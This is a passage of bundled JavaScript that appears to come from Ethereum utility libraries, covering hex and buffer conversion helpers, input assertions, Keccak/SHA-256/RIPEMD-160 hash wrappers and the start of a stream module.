 */ Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.isHexString = module.exports.getKeys = module.exports.fromAscii = module.exports.fromUtf8 = module.exports.toAscii = module.exports.arrayContainsArray = module.exports.getBinarySize = module.exports.padToEven = module.exports.stripHexPrefix = module.exports.isHexPrefixed = void 0;
/**
 * Returns a `Boolean` on whether or not the a `String` starts with '0x'
 * @param str the string input value
 * @return a boolean if it is or is not hex prefixed
 * @throws if the str input is not a string
 */ function $781289dd73a1c17e$var$isHexPrefixed(str) {
    if (typeof str !== "string") throw new Error("[isHexPrefixed] input must be type 'string', received type ".concat(typeof str));
    return str[0] === "0" && str[1] === "x";
}
module.exports.isHexPrefixed = $781289dd73a1c17e$var$isHexPrefixed;
/**
 * Removes '0x' from a given `String` if present
 * @param str the string value
 * @returns the string without 0x prefix
 */ var $781289dd73a1c17e$var$stripHexPrefix = function(str) {
    if (typeof str !== "string") throw new Error("[stripHexPrefix] input must be type 'string', received ".concat(typeof str));
    return $781289dd73a1c17e$var$isHexPrefixed(str) ? str.slice(2) : str;
};
module.exports.stripHexPrefix = $781289dd73a1c17e$var$stripHexPrefix;
/**
 * Pads a `String` to have an even length
 * @param value
 * @return output
 */ function $781289dd73a1c17e$var$padToEven(value) {
    var a = value;
    if (typeof a !== "string") throw new Error("[padToEven] value must be type 'string', received ".concat(typeof a));
    if (a.length % 2) a = "0".concat(a);
    return a;
}
module.exports.padToEven = $781289dd73a1c17e$var$padToEven;
/**
 * Get the binary size of a string
 * @param str
 * @returns the number of bytes contained within the string
 */ function $781289dd73a1c17e$var$getBinarySize(str) {
    if (typeof str !== "string") throw new Error("[getBinarySize] method requires input type 'string', recieved ".concat(typeof str));
    return $781289dd73a1c17e$require$Buffer.byteLength(str, "utf8");
}
module.exports.getBinarySize = $781289dd73a1c17e$var$getBinarySize;
/**
 * Returns TRUE if the first specified array contains all elements
 * from the second one. FALSE otherwise.
 *
 * @param superset
 * @param subset
 *
 */ function $781289dd73a1c17e$var$arrayContainsArray(superset, subset, some) {
    if (Array.isArray(superset) !== true) throw new Error("[arrayContainsArray] method requires input 'superset' to be an array, got type '".concat(typeof superset, "'"));
    if (Array.isArray(subset) !== true) throw new Error("[arrayContainsArray] method requires input 'subset' to be an array, got type '".concat(typeof subset, "'"));
    return subset[some ? "some" : "every"](function(value) {
        return superset.indexOf(value) >= 0;
    });
}
module.exports.arrayContainsArray = $781289dd73a1c17e$var$arrayContainsArray;
/**
 * Should be called to get ascii from its hex representation
 *
 * @param string in hex
 * @returns ascii string representation of hex value
 */ function $781289dd73a1c17e$var$toAscii(hex) {
    var str = "";
    var i = 0;
    var l = hex.length;
    if (hex.substring(0, 2) === "0x") i = 2;
    for(; i < l; i += 2){
        var code = parseInt(hex.substr(i, 2), 16);
        str += String.fromCharCode(code);
    }
    return str;
}
module.exports.toAscii = $781289dd73a1c17e$var$toAscii;
/**
 * Should be called to get hex representation (prefixed by 0x) of utf8 string
 *
 * @param string
 * @param optional padding
 * @returns hex representation of input string
 */ function $781289dd73a1c17e$var$fromUtf8(stringValue) {
    var str = $781289dd73a1c17e$require$Buffer.from(stringValue, "utf8");
    return "0x".concat($781289dd73a1c17e$var$padToEven(str.toString("hex")).replace(/^0+|0+$/g, ""));
}
module.exports.fromUtf8 = $781289dd73a1c17e$var$fromUtf8;
/**
 * Should be called to get hex representation (prefixed by 0x) of ascii string
 *
 * @param  string
 * @param  optional padding
 * @returns  hex representation of input string
 */ function $781289dd73a1c17e$var$fromAscii(stringValue) {
    var hex = "";
    for(var i = 0; i < stringValue.length; i++){
        var code = stringValue.charCodeAt(i);
        var n = code.toString(16);
        hex += n.length < 2 ? "0".concat(n) : n;
    }
    return "0x".concat(hex);
}
module.exports.fromAscii = $781289dd73a1c17e$var$fromAscii;
/**
 * Returns the keys from an array of objects.
 * @example
 * ```js
 * getKeys([{a: '1', b: '2'}, {a: '3', b: '4'}], 'a') => ['1', '3']
 *````
 * @param  params
 * @param  key
 * @param  allowEmpty
 * @returns output just a simple array of output keys
 */ function $781289dd73a1c17e$var$getKeys(params, key, allowEmpty) {
    if (!Array.isArray(params)) throw new Error("[getKeys] method expects input 'params' to be an array, got ".concat(typeof params));
    if (typeof key !== "string") throw new Error("[getKeys] method expects input 'key' to be type 'string', got ".concat(typeof params));
    var result = [];
    for(var i = 0; i < params.length; i++){
        var value = params[i][key];
        if (allowEmpty && !value) value = "";
        else if (typeof value !== "string") throw new Error("invalid abi - expected type 'string', received ".concat(typeof value));
        result.push(value);
    }
    return result;
}
module.exports.getKeys = $781289dd73a1c17e$var$getKeys;
/**
 * Is the string a hex string.
 *
 * @param  value
 * @param  length
 * @returns  output the string is a hex string
 */ function $781289dd73a1c17e$var$isHexString(value, length) {
    if (typeof value !== "string" || !value.match(/^0x[0-9A-Fa-f]*$/)) return false;
    if (length && value.length !== 2 + 2 * length) return false;
    return true;
}
module.exports.isHexString = $781289dd73a1c17e$var$isHexString;

});

parcelRequire.register("b61lJ", function(module, exports) {

var $6ZWSX = parcelRequire("6ZWSX");
var $81414d3539e03a13$require$Buffer = $6ZWSX.Buffer;
"use strict";
var $81414d3539e03a13$var$__values = module.exports && module.exports.__values || function(o) {
    var s = typeof Symbol === "function" && Symbol.iterator, m = s && o[s], i = 0;
    if (m) return m.call(o);
    if (o && typeof o.length === "number") return {
        next: function() {
            if (o && i >= o.length) o = void 0;
            return {
                value: o && o[i++],
                done: !o
            };
        }
    };
    throw new TypeError(s ? "Object is not iterable." : "Symbol.iterator is not defined.");
};
var $81414d3539e03a13$var$__read = module.exports && module.exports.__read || function(o, n) {
    var m = typeof Symbol === "function" && o[Symbol.iterator];
    if (!m) return o;
    var i = m.call(o), r, ar = [], e;
    try {
        while((n === void 0 || n-- > 0) && !(r = i.next()).done)ar.push(r.value);
    } catch (error) {
        e = {
            error: error
        };
    } finally{
        try {
            if (r && !r.done && (m = i["return"])) m.call(i);
        } finally{
            if (e) throw e.error;
        }
    }
    return ar;
};
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.bufArrToArr = module.exports.arrToBufArr = module.exports.validateNoLeadingZeroes = module.exports.baToJSON = module.exports.toUtf8 = module.exports.addHexPrefix = module.exports.toUnsigned = module.exports.fromSigned = module.exports.bufferToHex = module.exports.bufferToInt = module.exports.toBuffer = module.exports.unpadHexString = module.exports.unpadArray = module.exports.unpadBuffer = module.exports.setLengthRight = module.exports.setLengthLeft = module.exports.zeros = module.exports.intToBuffer = module.exports.intToHex = void 0;

var $4jhio = parcelRequire("4jhio");

var $aj8Qm = parcelRequire("aj8Qm");

var $7jIKp = parcelRequire("7jIKp");
/**
 * Converts a `Number` into a hex `String`
 * @param {Number} i
 * @return {String}
 */ var $81414d3539e03a13$var$intToHex = function(i) {
    if (!Number.isSafeInteger(i) || i < 0) throw new Error("Received an invalid integer type: ".concat(i));
    return "0x".concat(i.toString(16));
};
module.exports.intToHex = $81414d3539e03a13$var$intToHex;
/**
 * Converts an `Number` to a `Buffer`
 * @param {Number} i
 * @return {Buffer}
 */ var $81414d3539e03a13$var$intToBuffer = function(i) {
    var hex = (0, module.exports.intToHex)(i);
    return $81414d3539e03a13$require$Buffer.from((0, $aj8Qm.padToEven)(hex.slice(2)), "hex");
};
module.exports.intToBuffer = $81414d3539e03a13$var$intToBuffer;
/**
 * Returns a buffer filled with 0s.
 * @param bytes the number of bytes the buffer should be
 */ var $81414d3539e03a13$var$zeros = function(bytes) {
    return $81414d3539e03a13$require$Buffer.allocUnsafe(bytes).fill(0);
};
module.exports.zeros = $81414d3539e03a13$var$zeros;
/**
 * Pads a `Buffer` with zeros till it has `length` bytes.
 * Truncates the beginning or end of input if its length exceeds `length`.
 * @param msg the value to pad (Buffer)
 * @param length the number of bytes the output should be
 * @param right whether to start padding form the left or right
 * @return (Buffer)
 */ var $81414d3539e03a13$var$setLength = function(msg, length, right) {
    var buf = (0, module.exports.zeros)(length);
    if (right) {
        if (msg.length < length) {
            msg.copy(buf);
            return buf;
        }
        return msg.slice(0, length);
    } else {
        if (msg.length < length) {
            msg.copy(buf, length - msg.length);
            return buf;
        }
        return msg.slice(-length);
    }
};
/**
 * Left Pads a `Buffer` with leading zeros till it has `length` bytes.
 * Or it truncates the beginning if it exceeds.
 * @param msg the value to pad (Buffer)
 * @param length the number of bytes the output should be
 * @return (Buffer)
 */ var $81414d3539e03a13$var$setLengthLeft = function(msg, length) {
    (0, $7jIKp.assertIsBuffer)(msg);
    return $81414d3539e03a13$var$setLength(msg, length, false);
};
module.exports.setLengthLeft = $81414d3539e03a13$var$setLengthLeft;
/**
 * Right Pads a `Buffer` with trailing zeros till it has `length` bytes.
 * it truncates the end if it exceeds.
 * @param msg the value to pad (Buffer)
 * @param length the number of bytes the output should be
 * @return (Buffer)
 */ var $81414d3539e03a13$var$setLengthRight = function(msg, length) {
    (0, $7jIKp.assertIsBuffer)(msg);
    return $81414d3539e03a13$var$setLength(msg, length, true);
};
module.exports.setLengthRight = $81414d3539e03a13$var$setLengthRight;
/**
 * Trims leading zeros from a `Buffer`, `String` or `Number[]`.
 * @param a (Buffer|Array|String)
 * @return (Buffer|Array|String)
 */ var $81414d3539e03a13$var$stripZeros = function(a) {
    var first = a[0];
    while(a.length > 0 && first.toString() === "0"){
        a = a.slice(1);
        first = a[0];
    }
    return a;
};
/**
 * Trims leading zeros from a `Buffer`.
 * @param a (Buffer)
 * @return (Buffer)
 */ var $81414d3539e03a13$var$unpadBuffer = function(a) {
    (0, $7jIKp.assertIsBuffer)(a);
    return $81414d3539e03a13$var$stripZeros(a);
};
module.exports.unpadBuffer = $81414d3539e03a13$var$unpadBuffer;
/**
 * Trims leading zeros from an `Array` (of numbers).
 * @param a (number[])
 * @return (number[])
 */ var $81414d3539e03a13$var$unpadArray = function(a) {
    (0, $7jIKp.assertIsArray)(a);
    return $81414d3539e03a13$var$stripZeros(a);
};
module.exports.unpadArray = $81414d3539e03a13$var$unpadArray;
/**
 * Trims leading zeros from a hex-prefixed `String`.
 * @param a (String)
 * @return (String)
 */ var $81414d3539e03a13$var$unpadHexString = function(a) {
    (0, $7jIKp.assertIsHexString)(a);
    a = (0, $aj8Qm.stripHexPrefix)(a);
    return $81414d3539e03a13$var$stripZeros(a);
};
module.exports.unpadHexString = $81414d3539e03a13$var$unpadHexString;
/**
 * Attempts to turn a value into a `Buffer`.
 * Inputs supported: `Buffer`, `String` (hex-prefixed), `Number`, null/undefined, `BN` and other objects
 * with a `toArray()` or `toBuffer()` method.
 * @param v the value
 */ var $81414d3539e03a13$var$toBuffer = function(v) {
    if (v === null || v === undefined) return $81414d3539e03a13$require$Buffer.allocUnsafe(0);
    if ($81414d3539e03a13$require$Buffer.isBuffer(v)) return $81414d3539e03a13$require$Buffer.from(v);
    if (Array.isArray(v) || v instanceof Uint8Array) return $81414d3539e03a13$require$Buffer.from(v);
    if (typeof v === "string") {
        if (!(0, $aj8Qm.isHexString)(v)) throw new Error("Cannot convert string to buffer. toBuffer only supports 0x-prefixed hex strings and this string was given: ".concat(v));
        return $81414d3539e03a13$require$Buffer.from((0, $aj8Qm.padToEven)((0, $aj8Qm.stripHexPrefix)(v)), "hex");
    }
    if (typeof v === "number") return (0, module.exports.intToBuffer)(v);
    if ($4jhio.BN.isBN(v)) {
        if (v.isNeg()) throw new Error("Cannot convert negative BN to buffer. Given: ".concat(v));
        return v.toArrayLike($81414d3539e03a13$require$Buffer);
    }
    if (v.toArray) // converts a BN to a Buffer
    return $81414d3539e03a13$require$Buffer.from(v.toArray());
    if (v.toBuffer) return $81414d3539e03a13$require$Buffer.from(v.toBuffer());
    throw new Error("invalid type");
};
module.exports.toBuffer = $81414d3539e03a13$var$toBuffer;
/**
 * Converts a `Buffer` to a `Number`.
 * @param buf `Buffer` object to convert
 * @throws If the input number exceeds 53 bits.
 */ var $81414d3539e03a13$var$bufferToInt = function(buf) {
    return new $4jhio.BN((0, module.exports.toBuffer)(buf)).toNumber();
};
module.exports.bufferToInt = $81414d3539e03a13$var$bufferToInt;
/**
 * Converts a `Buffer` into a `0x`-prefixed hex `String`.
 * @param buf `Buffer` object to convert
 */ var $81414d3539e03a13$var$bufferToHex = function(buf) {
    buf = (0, module.exports.toBuffer)(buf);
    return "0x" + buf.toString("hex");
};
module.exports.bufferToHex = $81414d3539e03a13$var$bufferToHex;
/**
 * Interprets a `Buffer` as a signed integer and returns a `BN`. Assumes 256-bit numbers.
 * @param num Signed integer value
 */ var $81414d3539e03a13$var$fromSigned = function(num) {
    return new $4jhio.BN(num).fromTwos(256);
};
module.exports.fromSigned = $81414d3539e03a13$var$fromSigned;
/**
 * Converts a `BN` to an unsigned integer and returns it as a `Buffer`. Assumes 256-bit numbers.
 * @param num
 */ var $81414d3539e03a13$var$toUnsigned = function(num) {
    return $81414d3539e03a13$require$Buffer.from(num.toTwos(256).toArray());
};
module.exports.toUnsigned = $81414d3539e03a13$var$toUnsigned;
/**
 * Adds "0x" to a given `String` if it does not already start with "0x".
 */ var $81414d3539e03a13$var$addHexPrefix = function(str) {
    if (typeof str !== "string") return str;
    return (0, $aj8Qm.isHexPrefixed)(str) ? str : "0x" + str;
};
module.exports.addHexPrefix = $81414d3539e03a13$var$addHexPrefix;
/**
 * Returns the utf8 string representation from a hex string.
 *
 * Examples:
 *
 * Input 1: '657468657265756d000000000000000000000000000000000000000000000000'
 * Input 2: '657468657265756d'
 * Input 3: '000000000000000000000000000000000000000000000000657468657265756d'
 *
 * Output (all 3 input variants): 'ethereum'
 *
 * Note that this method is not intended to be used with hex strings
 * representing quantities in both big endian or little endian notation.
 *
 * @param string Hex string, should be `0x` prefixed
 * @return Utf8 string
 */ var $81414d3539e03a13$var$toUtf8 = function(hex) {
    var zerosRegexp = /^(00)+|(00)+$/g;
    hex = (0, $aj8Qm.stripHexPrefix)(hex);
    if (hex.length % 2 !== 0) throw new Error("Invalid non-even hex string input for toUtf8() provided");
    var bufferVal = $81414d3539e03a13$require$Buffer.from(hex.replace(zerosRegexp, ""), "hex");
    return bufferVal.toString("utf8");
};
module.exports.toUtf8 = $81414d3539e03a13$var$toUtf8;
/**
 * Converts a `Buffer` or `Array` to JSON.
 * @param ba (Buffer|Array)
 * @return (Array|String|null)
 */ var $81414d3539e03a13$var$baToJSON = function(ba) {
    if ($81414d3539e03a13$require$Buffer.isBuffer(ba)) return "0x".concat(ba.toString("hex"));
    else if (ba instanceof Array) {
        var array = [];
        for(var i = 0; i < ba.length; i++)array.push((0, module.exports.baToJSON)(ba[i]));
        return array;
    }
};
module.exports.baToJSON = $81414d3539e03a13$var$baToJSON;
/**
 * Checks provided Buffers for leading zeroes and throws if found.
 *
 * Examples:
 *
 * Valid values: 0x1, 0x, 0x01, 0x1234
 * Invalid values: 0x0, 0x00, 0x001, 0x0001
 *
 * Note: This method is useful for validating that RLP encoded integers comply with the rule that all
 * integer values encoded to RLP must be in the most compact form and contain no leading zero bytes
 * @param values An object containing string keys and Buffer values
 * @throws if any provided value is found to have leading zero bytes
 */ var $81414d3539e03a13$var$validateNoLeadingZeroes = function(values) {
    var e_1, _a;
    try {
        for(var _b = $81414d3539e03a13$var$__values(Object.entries(values)), _c = _b.next(); !_c.done; _c = _b.next()){
            var _d = $81414d3539e03a13$var$__read(_c.value, 2), k = _d[0], v = _d[1];
            if (v !== undefined && v.length > 0 && v[0] === 0) throw new Error("".concat(k, " cannot have leading zeroes, received: ").concat(v.toString("hex")));
        }
    } catch (e_1_1) {
        e_1 = {
            error: e_1_1
        };
    } finally{
        try {
            if (_c && !_c.done && (_a = _b.return)) _a.call(_b);
        } finally{
            if (e_1) throw e_1.error;
        }
    }
};
module.exports.validateNoLeadingZeroes = $81414d3539e03a13$var$validateNoLeadingZeroes;
function $81414d3539e03a13$var$arrToBufArr(arr) {
    if (!Array.isArray(arr)) return $81414d3539e03a13$require$Buffer.from(arr);
    return arr.map(function(a) {
        return $81414d3539e03a13$var$arrToBufArr(a);
    });
}
module.exports.arrToBufArr = $81414d3539e03a13$var$arrToBufArr;
function $81414d3539e03a13$var$bufArrToArr(arr) {
    if (!Array.isArray(arr)) return Uint8Array.from(arr !== null && arr !== void 0 ? arr : []);
    return arr.map(function(a) {
        return $81414d3539e03a13$var$bufArrToArr(a);
    });
}
module.exports.bufArrToArr = $81414d3539e03a13$var$bufArrToArr;

});
parcelRequire.register("7jIKp", function(module, exports) {

var $6ZWSX = parcelRequire("6ZWSX");
var $553d04ab4f0b6098$require$Buffer = $6ZWSX.Buffer;
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.assertIsString = module.exports.assertIsArray = module.exports.assertIsBuffer = module.exports.assertIsHexString = void 0;

var $aj8Qm = parcelRequire("aj8Qm");
/**
 * Throws if a string is not hex prefixed
 * @param {string} input string to check hex prefix of
 */ var $553d04ab4f0b6098$var$assertIsHexString = function(input) {
    if (!(0, $aj8Qm.isHexString)(input)) {
        var msg = "This method only supports 0x-prefixed hex strings but input was: ".concat(input);
        throw new Error(msg);
    }
};
module.exports.assertIsHexString = $553d04ab4f0b6098$var$assertIsHexString;
/**
 * Throws if input is not a buffer
 * @param {Buffer} input value to check
 */ var $553d04ab4f0b6098$var$assertIsBuffer = function(input) {
    if (!$553d04ab4f0b6098$require$Buffer.isBuffer(input)) {
        var msg = "This method only supports Buffer but input was: ".concat(input);
        throw new Error(msg);
    }
};
module.exports.assertIsBuffer = $553d04ab4f0b6098$var$assertIsBuffer;
/**
 * Throws if input is not an array
 * @param {number[]} input value to check
 */ var $553d04ab4f0b6098$var$assertIsArray = function(input) {
    if (!Array.isArray(input)) {
        var msg = "This method only supports number arrays but input was: ".concat(input);
        throw new Error(msg);
    }
};
module.exports.assertIsArray = $553d04ab4f0b6098$var$assertIsArray;
/**
 * Throws if input is not a string
 * @param {string} input value to check
 */ var $553d04ab4f0b6098$var$assertIsString = function(input) {
    if (typeof input !== "string") {
        var msg = "This method only supports strings but input was: ".concat(input);
        throw new Error(msg);
    }
};
module.exports.assertIsString = $553d04ab4f0b6098$var$assertIsString;

});


parcelRequire.register("gKSHR", function(module, exports) {

var $6ZWSX = parcelRequire("6ZWSX");
var $c32b60c1ed6688ec$require$Buffer = $6ZWSX.Buffer;
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.rlphash = module.exports.ripemd160FromArray = module.exports.ripemd160FromString = module.exports.ripemd160 = module.exports.sha256FromArray = module.exports.sha256FromString = module.exports.sha256 = module.exports.keccakFromArray = module.exports.keccakFromHexString = module.exports.keccakFromString = module.exports.keccak256 = module.exports.keccak = void 0;

var $hSqxR = parcelRequire("hSqxR");

var $1R2J7 = parcelRequire("1R2J7");

var $4jhio = parcelRequire("4jhio");

var $b61lJ = parcelRequire("b61lJ");

var $7jIKp = parcelRequire("7jIKp");
/**
 * Creates Keccak hash of a Buffer input
 * @param a The input data (Buffer)
 * @param bits (number = 256) The Keccak width
 */ var $c32b60c1ed6688ec$var$keccak = function(a, bits) {
    if (bits === void 0) bits = 256;
    (0, $7jIKp.assertIsBuffer)(a);
    switch(bits){
        case 224:
            return (0, $hSqxR.keccak224)(a);
        case 256:
            return (0, $hSqxR.keccak256)(a);
        case 384:
            return (0, $hSqxR.keccak384)(a);
        case 512:
            return (0, $hSqxR.keccak512)(a);
        default:
            throw new Error("Invald algorithm: keccak".concat(bits));
    }
};
module.exports.keccak = $c32b60c1ed6688ec$var$keccak;
/**
 * Creates Keccak-256 hash of the input, alias for keccak(a, 256).
 * @param a The input data (Buffer)
 */ var $c32b60c1ed6688ec$var$keccak256 = function(a) {
    return (0, module.exports.keccak)(a);
};
module.exports.keccak256 = $c32b60c1ed6688ec$var$keccak256;
/**
 * Creates Keccak hash of a utf-8 string input
 * @param a The input data (String)
 * @param bits (number = 256) The Keccak width
 */ var $c32b60c1ed6688ec$var$keccakFromString = function(a, bits) {
    if (bits === void 0) bits = 256;
    (0, $7jIKp.assertIsString)(a);
    var buf = $c32b60c1ed6688ec$require$Buffer.from(a, "utf8");
    return (0, module.exports.keccak)(buf, bits);
};
module.exports.keccakFromString = $c32b60c1ed6688ec$var$keccakFromString;
/**
 * Creates Keccak hash of an 0x-prefixed string input
 * @param a The input data (String)
 * @param bits (number = 256) The Keccak width
 */ var $c32b60c1ed6688ec$var$keccakFromHexString = function(a, bits) {
    if (bits === void 0) bits = 256;
    (0, $7jIKp.assertIsHexString)(a);
    return (0, module.exports.keccak)((0, $b61lJ.toBuffer)(a), bits);
};
module.exports.keccakFromHexString = $c32b60c1ed6688ec$var$keccakFromHexString;
/**
 * Creates Keccak hash of a number array input
 * @param a The input data (number[])
 * @param bits (number = 256) The Keccak width
 */ var $c32b60c1ed6688ec$var$keccakFromArray = function(a, bits) {
    if (bits === void 0) bits = 256;
    (0, $7jIKp.assertIsArray)(a);
    return (0, module.exports.keccak)((0, $b61lJ.toBuffer)(a), bits);
};
module.exports.keccakFromArray = $c32b60c1ed6688ec$var$keccakFromArray;
/**
 * Creates SHA256 hash of an input.
 * @param  a The input data (Buffer|Array|String)
 */ var $c32b60c1ed6688ec$var$_sha256 = function(a) {
    a = (0, $b61lJ.toBuffer)(a);
    return $1R2J7("sha256").update(a).digest();
};
/**
 * Creates SHA256 hash of a Buffer input.
 * @param a The input data (Buffer)
 */ var $c32b60c1ed6688ec$var$sha256 = function(a) {
    (0, $7jIKp.assertIsBuffer)(a);
    return $c32b60c1ed6688ec$var$_sha256(a);
};
module.exports.sha256 = $c32b60c1ed6688ec$var$sha256;
/**
 * Creates SHA256 hash of a string input.
 * @param a The input data (string)
 */ var $c32b60c1ed6688ec$var$sha256FromString = function(a) {
    (0, $7jIKp.assertIsString)(a);
    return $c32b60c1ed6688ec$var$_sha256(a);
};
module.exports.sha256FromString = $c32b60c1ed6688ec$var$sha256FromString;
/**
 * Creates SHA256 hash of a number[] input.
 * @param a The input data (number[])
 */ var $c32b60c1ed6688ec$var$sha256FromArray = function(a) {
    (0, $7jIKp.assertIsArray)(a);
    return $c32b60c1ed6688ec$var$_sha256(a);
};
module.exports.sha256FromArray = $c32b60c1ed6688ec$var$sha256FromArray;
/**
 * Creates RIPEMD160 hash of the input.
 * @param a The input data (Buffer|Array|String|Number)
 * @param padded Whether it should be padded to 256 bits or not
 */ var $c32b60c1ed6688ec$var$_ripemd160 = function(a, padded) {
    a = (0, $b61lJ.toBuffer)(a);
    var hash = $1R2J7("rmd160").update(a).digest();
    if (padded === true) return (0, $b61lJ.setLengthLeft)(hash, 32);
    else return hash;
};
/**
 * Creates RIPEMD160 hash of a Buffer input.
 * @param a The input data (Buffer)
 * @param padded Whether it should be padded to 256 bits or not
 */ var $c32b60c1ed6688ec$var$ripemd160 = function(a, padded) {
    (0, $7jIKp.assertIsBuffer)(a);
    return $c32b60c1ed6688ec$var$_ripemd160(a, padded);
};
module.exports.ripemd160 = $c32b60c1ed6688ec$var$ripemd160;
/**
 * Creates RIPEMD160 hash of a string input.
 * @param a The input data (String)
 * @param padded Whether it should be padded to 256 bits or not
 */ var $c32b60c1ed6688ec$var$ripemd160FromString = function(a, padded) {
    (0, $7jIKp.assertIsString)(a);
    return $c32b60c1ed6688ec$var$_ripemd160(a, padded);
};
module.exports.ripemd160FromString = $c32b60c1ed6688ec$var$ripemd160FromString;
/**
 * Creates RIPEMD160 hash of a number[] input.
 * @param a The input data (number[])
 * @param padded Whether it should be padded to 256 bits or not
 */ var $c32b60c1ed6688ec$var$ripemd160FromArray = function(a, padded) {
    (0, $7jIKp.assertIsArray)(a);
    return $c32b60c1ed6688ec$var$_ripemd160(a, padded);
};
module.exports.ripemd160FromArray = $c32b60c1ed6688ec$var$ripemd160FromArray;
/**
 * Creates SHA-3 hash of the RLP encoded version of the input.
 * @param a The input data
 */ var $c32b60c1ed6688ec$var$rlphash = function(a) {
    return (0, module.exports.keccak)($4jhio.rlp.encode(a));
};
module.exports.rlphash = $c32b60c1ed6688ec$var$rlphash;

});
parcelRequire.register("hSqxR", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});

var $5rVGn = parcelRequire("5rVGn");

var $X8PsT = parcelRequire("X8PsT");
module.exports.keccak224 = $5rVGn.createHashFunction(function() {
    return $X8PsT("keccak224");
});
module.exports.keccak256 = $5rVGn.createHashFunction(function() {
    return $X8PsT("keccak256");
});
module.exports.keccak384 = $5rVGn.createHashFunction(function() {
    return $X8PsT("keccak384");
});
module.exports.keccak512 = $5rVGn.createHashFunction(function() {
    return $X8PsT("keccak512");
});

});
parcelRequire.register("5rVGn", function(module, exports) {

var $6ZWSX = parcelRequire("6ZWSX");
var $3f7c37ee93184755$require$Buffer = $6ZWSX.Buffer;
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
function $3f7c37ee93184755$var$createHashFunction(hashConstructor) {
    return function(msg) {
        var hash = hashConstructor();
        hash.update(msg);
        return $3f7c37ee93184755$require$Buffer.from(hash.digest());
    };
}
module.exports.createHashFunction = $3f7c37ee93184755$var$createHashFunction;

});

parcelRequire.register("X8PsT", function(module, exports) {


module.exports = (parcelRequire("d8tul"))((parcelRequire("l2DpN")));

});
parcelRequire.register("d8tul", function(module, exports) {

var $lO6fo = parcelRequire("lO6fo");

var $4jc6M = parcelRequire("4jc6M");
module.exports = function(KeccakState) {
    const Keccak = $lO6fo(KeccakState);
    const Shake = $4jc6M(KeccakState);
    return function(algorithm, options) {
        const hash = typeof algorithm === "string" ? algorithm.toLowerCase() : algorithm;
        switch(hash){
            case "keccak224":
                return new Keccak(1152, 448, null, 224, options);
            case "keccak256":
                return new Keccak(1088, 512, null, 256, options);
            case "keccak384":
                return new Keccak(832, 768, null, 384, options);
            case "keccak512":
                return new Keccak(576, 1024, null, 512, options);
            case "sha3-224":
                return new Keccak(1152, 448, 0x06, 224, options);
            case "sha3-256":
                return new Keccak(1088, 512, 0x06, 256, options);
            case "sha3-384":
                return new Keccak(832, 768, 0x06, 384, options);
            case "sha3-512":
                return new Keccak(576, 1024, 0x06, 512, options);
            case "shake128":
                return new Shake(1344, 256, 0x1f, options);
            case "shake256":
                return new Shake(1088, 512, 0x1f, options);
            default:
                throw new Error("Invald algorithm: " + algorithm);
        }
    };
};

});
parcelRequire.register("lO6fo", function(module, exports) {

var $6ZWSX = parcelRequire("6ZWSX");
var $fe031d0e6064652e$require$Buffer = $6ZWSX.Buffer;

var $b6RFW = parcelRequire("b6RFW");
var $fe031d0e6064652e$require$Transform = $b6RFW.Transform;
module.exports = (KeccakState)=>class Keccak extends $fe031d0e6064652e$require$Transform {
        constructor(rate, capacity, delimitedSuffix, hashBitLength, options){
            super(options);
            this._rate = rate;
            this._capacity = capacity;
            this._delimitedSuffix = delimitedSuffix;
            this._hashBitLength = hashBitLength;
            this._options = options;
            this._state = new KeccakState();
            this._state.initialize(rate, capacity);
            this._finalized = false;
        }
        _transform(chunk, encoding, callback) {
            let error = null;
            try {
                this.update(chunk, encoding);
            } catch (err) {
                error = err;
            }
            callback(error);
        }
        _flush(callback) {
            let error = null;
            try {
                this.push(this.digest());
            } catch (err) {
                error = err;
            }
            callback(error);
        }
        update(data, encoding) {
            if (!$fe031d0e6064652e$require$Buffer.isBuffer(data) && typeof data !== "string") throw new TypeError("Data must be a string or a buffer");
            if (this._finalized) throw new Error("Digest already called");
            if (!$fe031d0e6064652e$require$Buffer.isBuffer(data)) data = $fe031d0e6064652e$require$Buffer.from(data, encoding);
            this._state.absorb(data);
            return this;
        }
        digest(encoding) {
            if (this._finalized) throw new Error("Digest already called");
            this._finalized = true;
            if (this._delimitedSuffix) this._state.absorbLastFewBits(this._delimitedSuffix);
            let digest = this._state.squeeze(this._hashBitLength / 8);
            if (encoding !== undefined) digest = digest.toString(encoding);
            this._resetState();
            return digest;
        }
        // remove result from memory
        _resetState() {
            this._state.initialize(this._rate, this._capacity);
            return this;
        }
        // because sometimes we need hash right now and little later
        _clone() {
            const clone = new Keccak(this._rate, this._capacity, this._delimitedSuffix, this._hashBitLength, this._options);
            this._state.copy(clone._state);
            clone._finalized = this._finalized;
            return clone;
        }
    };

});
parcelRequire.register("b6RFW", function(module, exports) {

exports = module.exports = (parcelRequire("d4xg3"));
exports.Stream = exports;
exports.Readable = exports;

exports.Writable = (parcelRequire("3LwY7"));

exports.Duplex = (parcelRequire("DwJuQ"));

exports.Transform = (parcelRequire("b7kl8"));

exports.PassThrough = (parcelRequire("4wWcs"));

exports.finished = (parcelRequire("fiCvv"));

exports.pipeline = (parcelRequire("aGSwO"));

});
parcelRequire.register("d4xg3", function(module, exports) {
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.

var $hPtJY = parcelRequire("hPtJY");
"use strict";
module.exports = $9845726cca5dc7eb$var$Readable;
